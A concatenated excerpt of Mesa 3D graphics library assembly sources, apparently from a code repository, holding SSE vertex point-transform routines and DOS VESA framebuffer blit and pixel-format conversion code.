ADDSS ( XMM4, XMM0 ) /* +m14 */
MOVSS ( XMM0, D(2) ) /* ->D(2) */
MOVSS ( S(2), XMM0 ) /* oz */
MOVSS ( XMM6, XMM5 ) /* 0 */
SUBPS ( XMM0, XMM5 ) /* -oz */
MOVSS ( XMM5, D(3) ) /* ->D(3) */
LLBL(K_GTP3PR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP3PR_top) )
LLBL(K_GTP3PR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points3_2d)
HIDDEN(_mesa_sse_transform_points3_2d)
GLNAME(_mesa_sse_transform_points3_2d):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP3P2DR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVLPS( M(0), XMM0 ) /* m1 | m0 */
MOVLPS( M(4), XMM1 ) /* m5 | m4 */
MOVLPS( M(12), XMM2 ) /* m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP3P2DR_top):
MOVSS ( S(0), XMM3 ) /* ox */
SHUFPS ( CONST(0x0), XMM3, XMM3 ) /* ox | ox */
MULPS ( XMM0, XMM3 ) /* ox*m1 | ox*m0 */
MOVSS ( S(1), XMM4 ) /* oy */
SHUFPS ( CONST(0x0), XMM4, XMM4 ) /* oy | oy */
MULPS ( XMM1, XMM4 ) /* oy*m5 | oy*m4 */
ADDPS ( XMM4, XMM3 )
ADDPS ( XMM2, XMM3 )
MOVLPS ( XMM3, D(0) )
MOVSS ( S(2), XMM3 )
MOVSS ( XMM3, D(2) )
LLBL(K_GTP3P2DR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP3P2DR_top) )
LLBL(K_GTP3P2DR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points3_2d_no_rot)
HIDDEN(_mesa_sse_transform_points3_2d_no_rot)
GLNAME(_mesa_sse_transform_points3_2d_no_rot):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP3P2DNRR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS ( M(0), XMM1 ) /* m0 */
MOVSS ( M(5), XMM2 ) /* m5 */
UNPCKLPS ( XMM2, XMM1 ) /* m5 | m0 */
MOVLPS ( M(12), XMM2 ) /* m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP3P2DNRR_top):
MOVLPS( S(0), XMM0 ) /* oy | ox */
MULPS( XMM1, XMM0 ) /* oy*m5 | ox*m0 */
ADDPS( XMM2, XMM0 ) /* +m13 | +m12 */
MOVLPS( XMM0, D(0) ) /* ->D(1) | ->D(0) */
MOVSS( S(2), XMM0 )
MOVSS( XMM0, D(2) )
LLBL(K_GTP3P2DNRR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP3P2DNRR_top) )
LLBL(K_GTP3P2DNRR_finish):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points3_3d)
HIDDEN(_mesa_sse_transform_points3_3d)
GLNAME(_mesa_sse_transform_points3_3d):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP3P3DR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVAPS( M(0), XMM0 ) /* m2 | m1 | m0 */
MOVAPS( M(4), XMM1 ) /* m6 | m5 | m4 */
MOVAPS( M(8), XMM2 ) /* m10 | m9 | m8 */
MOVAPS( M(12), XMM3 ) /* m14 | m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP3P3DR_top):
MOVSS( S(0), XMM4 )
SHUFPS( CONST(0x0), XMM4, XMM4 ) /* ox | ox | ox */
MULPS( XMM0, XMM4 ) /* ox*m2 | ox*m1 | ox*m0 */
MOVSS( S(1), XMM5 )
SHUFPS( CONST(0x0), XMM5, XMM5 ) /* oy | oy | oy */
MULPS( XMM1, XMM5 ) /* oy*m6 | oy*m5 | oy*m4 */
MOVSS( S(2), XMM6 )
SHUFPS( CONST(0x0), XMM6, XMM6 ) /* oz | oz | oz */
MULPS( XMM2, XMM6 ) /* oz*m10 | oz*m9 | oz*m8 */
ADDPS( XMM5, XMM4 ) /* + | + | + */
ADDPS( XMM6, XMM4 ) /* + | + | + */
ADDPS( XMM3, XMM4 ) /* + | + | + */
MOVLPS( XMM4, D(0) ) /* => D(1) | => D(0) */
UNPCKHPS( XMM4, XMM4 )
MOVSS( XMM4, D(2) )
LLBL(K_GTP3P3DR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP3P3DR_top) )
LLBL(K_GTP3P3DR_finish):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 7,051
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/sse_xform4.S
|
/* $Id: sse_xform4.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#ifdef USE_SSE_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define FRAME_OFFSET 8
#define SRC(i) REGOFF(i * 4, ESI)
#define DST(i) REGOFF(i * 4, EDI)
#define MAT(i) REGOFF(i * 4, EDX)
#define SELECT(r0, r1, r2, r3) CONST( r0 * 64 + r1 * 16 + r2 * 4 + r3 )
ALIGNTEXT16
GLOBL GLNAME( _mesa_sse_transform_points4_general )
HIDDEN(_mesa_sse_transform_points4_general)
GLNAME( _mesa_sse_transform_points4_general ):
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX ) /* verify non-zero count */
JE( LLBL( sse_general_done ) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )/* set dest size */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
PREFETCHT0( REGIND(ESI) )
MOVAPS( MAT(0), XMM4 ) /* m3 | m2 | m1 | m0 */
MOVAPS( MAT(4), XMM5 ) /* m7 | m6 | m5 | m4 */
MOVAPS( MAT(8), XMM6 ) /* m11 | m10 | m9 | m8 */
MOVAPS( MAT(12), XMM7 ) /* m15 | m14 | m13 | m12 */
ALIGNTEXT16
LLBL( sse_general_loop ):
MOVSS( SRC(0), XMM0 ) /* ox */
SHUFPS( CONST(0x0), XMM0, XMM0 ) /* ox | ox | ox | ox */
MULPS( XMM4, XMM0 ) /* ox*m3 | ox*m2 | ox*m1 | ox*m0 */
MOVSS( SRC(1), XMM1 ) /* oy */
SHUFPS( CONST(0x0), XMM1, XMM1 ) /* oy | oy | oy | oy */
MULPS( XMM5, XMM1 ) /* oy*m7 | oy*m6 | oy*m5 | oy*m4 */
MOVSS( SRC(2), XMM2 ) /* oz */
SHUFPS( CONST(0x0), XMM2, XMM2 ) /* oz | oz | oz | oz */
MULPS( XMM6, XMM2 ) /* oz*m11 | oz*m10 | oz*m9 | oz*m8 */
MOVSS( SRC(3), XMM3 ) /* ow */
SHUFPS( CONST(0x0), XMM3, XMM3 ) /* ow | ow | ow | ow */
MULPS( XMM7, XMM3 ) /* ow*m15 | ow*m14 | ow*m13 | ow*m12 */
ADDPS( XMM1, XMM0 ) /* ox*m3+oy*m7 | ... */
ADDPS( XMM2, XMM0 ) /* ox*m3+oy*m7+oz*m11 | ... */
ADDPS( XMM3, XMM0 ) /* ox*m3+oy*m7+oz*m11+ow*m15 | ... */
MOVAPS( XMM0, DST(0) ) /* ->D(3) | ->D(2) | ->D(1) | ->D(0) */
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
DEC_L( ECX )
JNZ( LLBL( sse_general_loop ) )
LLBL( sse_general_done ):
POP_L( EDI )
POP_L( ESI )
RET
ALIGNTEXT4
GLOBL GLNAME( _mesa_sse_transform_points4_3d )
HIDDEN(_mesa_sse_transform_points4_3d)
GLNAME( _mesa_sse_transform_points4_3d ):
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI ) /* ptr to source GLvector4f */
MOV_L( ARG_DEST, EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP43P3DR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )/* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
MOVAPS( MAT(0), XMM0 ) /* m3 | m2 | m1 | m0 */
MOVAPS( MAT(4), XMM1 ) /* m7 | m6 | m5 | m4 */
MOVAPS( MAT(8), XMM2 ) /* m11 | m10 | m9 | m8 */
MOVAPS( MAT(12), XMM3 ) /* m15 | m14 | m13 | m12 */
ALIGNTEXT32
LLBL( K_GTP43P3DR_top ):
MOVSS( SRC(0), XMM4 ) /* ox */
SHUFPS( CONST(0x0), XMM4, XMM4 ) /* ox | ox | ox | ox */
MULPS( XMM0, XMM4 ) /* ox*m3 | ox*m2 | ox*m1 | ox*m0 */
MOVSS( SRC(1), XMM5 ) /* oy */
SHUFPS( CONST(0x0), XMM5, XMM5 ) /* oy | oy | oy | oy */
MULPS( XMM1, XMM5 ) /* oy*m7 | oy*m6 | oy*m5 | oy*m4 */
MOVSS( SRC(2), XMM6 ) /* oz */
SHUFPS( CONST(0x0), XMM6, XMM6 ) /* oz | oz | oz | oz */
MULPS( XMM2, XMM6 ) /* oz*m11 | oz*m10 | oz*m9 | oz*m8 */
MOVSS( SRC(3), XMM7 ) /* ow */
SHUFPS( CONST(0x0), XMM7, XMM7 ) /* ow | ow | ow | ow */
MULPS( XMM3, XMM7 ) /* ow*m15 | ow*m14 | ow*m13 | ow*m12 */
ADDPS( XMM5, XMM4 ) /* ox*m3+oy*m7 | ... */
ADDPS( XMM6, XMM4 ) /* ox*m3+oy*m7+oz*m11 | ... */
ADDPS( XMM7, XMM4 ) /* ox*m3+oy*m7+oz*m11+ow*m15 | ... */
MOVAPS( XMM4, DST(0) ) /* ->D(3) | ->D(2) | ->D(1) | ->D(0) */
MOVSS( SRC(3), XMM4 ) /* ow */
MOVSS( XMM4, DST(3) ) /* ->D(3) */
LLBL( K_GTP43P3DR_skip ):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP43P3DR_top) )
LLBL( K_GTP43P3DR_finish ):
POP_L( EDI )
POP_L( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_sse_transform_points4_identity )
HIDDEN(_mesa_sse_transform_points4_identity)
GLNAME( _mesa_sse_transform_points4_identity ):
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX ) /* verify non-zero count */
JE( LLBL( sse_identity_done ) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )/* set dest size */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ALIGNTEXT16
LLBL( sse_identity_loop ):
PREFETCHNTA( REGOFF(32, ESI) )
MOVAPS( REGIND(ESI), XMM0 )
ADD_L( EAX, ESI )
MOVAPS( XMM0, REGIND(EDI) )
ADD_L( CONST(16), EDI )
DEC_L( ECX )
JNZ( LLBL( sse_identity_loop ) )
LLBL( sse_identity_done ):
POP_L( EDI )
POP_L( ESI )
RET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 18,871
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/drivers/dos/blit.S
|
/*
* Mesa 3-D graphics library
* Version: 4.0
*
* Copyright (C) 1999 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* DOS/DJGPP device driver for Mesa
*
* Author: Daniel Borca
* Email : dborca@yahoo.com
* Web : http://www.geocities.com/dborca
*/
.file "blit.S"
/*
* extern unsigned int vesa_gran_mask, vesa_gran_shift;
* extern int vl_video_selector;
* extern void *vl_current_draw_buffer;
* extern int vl_current_stride, vl_current_height;
* extern int vl_current_offset, vl_current_delta;
*/
.text
/* Desc: VESA bank switching routine (BIOS)
*
* In : EBX=0, EDX = bank number
* Out : -
*
* Note: thrashes EAX
*/
.p2align 5,,31
_vesa_swbankBIOS:
movw $0x4f05, %ax
int $0x10
ret
.p2align 2,,3
.global _vesa_swbank
_vesa_swbank: .long _vesa_swbankBIOS
/* Desc: void vesa_b_dump_virtual (void);
*
* In : -
* Out : -
*
* Note: uses current draw buffer
*/
.p2align 5,,31
.global _vesa_b_dump_virtual
_vesa_b_dump_virtual:
cld
pushl %es
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %es
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi
shrl %cl, %edx
incl %ebp
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
movl _vl_current_delta, %ebx
shrl $2, %ecx
.balign 4
0:
pushl %ecx
.balign 4
1:
cmpl %ebp, %edi
jb 2f
pushl %eax
pushl %ebx
incl %edx
xorl %ebx, %ebx
call *_vesa_swbank
popl %ebx
popl %eax
subl %ebp, %edi
.balign 4
2:
movsl
decl %ecx
jnz 1b
popl %ecx
addl %ebx, %edi
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
popl %es
ret
/* Desc: void vesa_l_dump_virtual (void);
*
* In : -
* Out : -
*
* Note: uses current draw buffer
*/
.p2align 5,,31
.global _vesa_l_dump_virtual
_vesa_l_dump_virtual:
cld
pushl %es
pushl %esi
pushl %edi
movl _vl_video_selector, %es
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %eax
shrl $2, %ecx
.balign 4
0:
pushl %ecx
rep; movsl
popl %ecx
addl %eax, %edi
decl %edx
jnz 0b
popl %edi
popl %esi
popl %es
ret
/* Desc: void vesa_l_dump_virtual_mmx (void);
*
* In : -
* Out : -
*
* Note: uses current draw buffer
*/
.p2align 5,,31
.global _vesa_l_dump_virtual_mmx
_vesa_l_dump_virtual_mmx:
#ifdef USE_MMX_ASM
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %eax
shrl $3, %ecx
.balign 4
0:
pushl %ecx
.balign 4
1:
movq (%esi), %mm0
addl $8, %esi
movq %mm0, %fs:(%edi)
addl $8, %edi
decl %ecx
jnz 1b
popl %ecx
addl %eax, %edi
decl %edx
jnz 0b
popl %edi
popl %esi
emms
#endif
ret
#define CVT_32_TO_16(s, tmp) \
/* SRC = bbbbbbbbggggggggrrrrrrrr******** */\
movl %e##s##x, %tmp ;\
/* TMP = bbbbbbbbggggggggrrrrrrrr******** */\
shrb $2, %s##h ;\
/* SRC = bbbbbbbbgggggg00rrrrrrrr******** */\
andl $0xF80000, %tmp ;\
/* TMP = 0000000000000000000rrrrr00000000 */\
shrw $3, %s##x ;\
/* SRC = bbbbbgggggg00000rrrrrrrr******** */\
shrl $8, %tmp ;\
/* TMP = 00000000000rrrrr0000000000000000 */\
orl %tmp, %e##s##x ;\
/* SRC = bbbbbggggggrrrrrrrrrrrrr******** */
#define CVT_32_TO_15(s, tmp) \
/* SRC = bbbbbbbbggggggggrrrrrrrr******** */\
movl %e##s##x, %tmp ;\
/* TMP = bbbbbbbbggggggggrrrrrrrr******** */\
shrb $3, %s##h ;\
/* SRC = bbbbbbbbgggggg00rrrrrrrr******** */\
andl $0xF80000, %tmp ;\
/* TMP = 0000000000000000000rrrrr00000000 */\
shrw $3, %s##x ;\
/* SRC = bbbbbgggggg00000rrrrrrrr******** */\
shrl $9, %tmp ;\
/* TMP = 00000000000rrrrr0000000000000000 */\
orl %tmp, %e##s##x ;\
/* SRC = bbbbbggggggrrrrrrrrrrrrr******** */
#define CVT_16_TO_15(src, tmp) \
/* SRC = bbbbbggggggrrrrrBBBBBGGGGGGRRRRR */\
movl %src, %tmp ;\
/* TMP = bbbbbggggggrrrrrBBBBBGGGGGGRRRRR */\
andl $0x1F001F, %src ;\
/* SRC = bbbbb00000000000BBBBB00000000000 */\
andl $0xFFC0FFC0, %tmp ;\
/* TMP = 000000gggggrrrrr000000GGGGGRRRRR */\
shrl %tmp ;\
/* TMP = 00000gggggrrrrr000000GGGGGRRRRR0 */\
orl %tmp, %src ;\
/* SRC = bbbbbgggggrrrrr0BBBBBGGGGGRRRRR0 */\
/* transform BGRA to BGR */
.p2align 5,,31
.global _vesa_l_dump_32_to_24
_vesa_l_dump_32_to_24:
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %ecx
1:
movl (%esi), %eax
addl $4, %esi
movw %ax, %fs:(%edi)
shrl $16, %eax
movb %al, %fs:2(%edi)
addl $3, %edi
subl $3, %ecx
jnz 1b
popl %ecx
addl %ebx, %edi
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
ret
/* transform BGRA to B5G6R5 */
.p2align 5,,31
.global _vesa_l_dump_32_to_16
_vesa_l_dump_32_to_16:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %ecx
1:
movl (%esi), %eax
addl $4, %esi
CVT_32_TO_16(a, ebp)
movw %ax, %fs:(%edi)
addl $2, %edi
subl $2, %ecx
jnz 1b
popl %ecx
addl %ebx, %edi
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
/* transform BGRA to B5G5R5 */
.p2align 5,,31
.global _vesa_l_dump_32_to_15
_vesa_l_dump_32_to_15:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %ecx
1:
movl (%esi), %eax
addl $4, %esi
CVT_32_TO_15(a, ebp)
movw %ax, %fs:(%edi)
addl $2, %edi
subl $2, %ecx
jnz 1b
popl %ecx
addl %ebx, %edi
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
/* transform BGRA to fake8 */
.p2align 5,,31
.global _vesa_l_dump_32_to_8
_vesa_l_dump_32_to_8:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %edx
pushl %ecx
pushl %ebx
1:
movl (%esi), %eax
addl $4, %esi
#if 1
xorl %ebx, %ebx
movl %eax, %edx
movb %ah, %bl
shrl $16, %edx
andl $0xFF, %edx
andl $0xFF, %eax
movb _array_b(%eax), %al
movb _array_r(%edx), %dl
movb _array_g(%ebx), %bl
imull $36, %eax
imull $6, %ebx
addl %edx, %eax
addl %ebx, %eax
#endif
movb %al, %fs:(%edi)
incl %edi
decl %ecx
jnz 1b
popl %ebx
popl %ecx
popl %edx
addl %ebx, %edi
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
/* transform BGR to BGRx */
.p2align 5,,31
.global _vesa_l_dump_24_to_32
_vesa_l_dump_24_to_32:
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %ecx
1:
movl (%esi), %eax
addl $3, %esi
movl %eax, %fs:(%edi)
addl $4, %edi
subl $4, %ecx
jnz 1b
popl %ecx
addl %ebx, %edi
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
ret
/* transform BGR to fake8 */
.p2align 5,,31
.global _vesa_l_dump_24_to_8
_vesa_l_dump_24_to_8:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %edx
pushl %ecx
pushl %ebx
1:
movl (%esi), %eax
addl $3, %esi
#if 1
xorl %ebx, %ebx
movl %eax, %edx
movb %ah, %bl
shrl $16, %edx
andl $0xFF, %edx
andl $0xFF, %eax
movb _array_b(%eax), %al
movb _array_r(%edx), %dl
movb _array_g(%ebx), %bl
imull $36, %eax
imull $6, %ebx
addl %edx, %eax
addl %ebx, %eax
#endif
movb %al, %fs:(%edi)
incl %edi
decl %ecx
jnz 1b
popl %ebx
popl %ecx
popl %edx
addl %ebx, %edi
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
/* transform B5G6R5 to B5G5R5 */
.p2align 5,,31
.global _vesa_l_dump_16_to_15
_vesa_l_dump_16_to_15:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %ecx
1:
movl (%esi), %eax
addl $4, %esi
CVT_16_TO_15(eax, ebp)
movl %eax, %fs:(%edi)
addl $4, %edi
subl $4, %ecx
jnz 1b
popl %ecx
addl %ebx, %edi
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
/* transform B5G6R5 to fake8 */
.p2align 5,,31
.global _vesa_l_dump_16_to_8
_vesa_l_dump_16_to_8:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %ecx
pushl %ebx
1:
movl (%esi), %eax
addl $4, %esi
#if 1
movl %eax, %ebx
andl $0xFFFF, %eax
shrl $16, %ebx
movb _tab_16_8(%eax), %al
movb _tab_16_8(%ebx), %ah
#endif
movw %ax, %fs:(%edi)
addl $2, %edi
subl $2, %ecx
jnz 1b
popl %ebx
popl %ecx
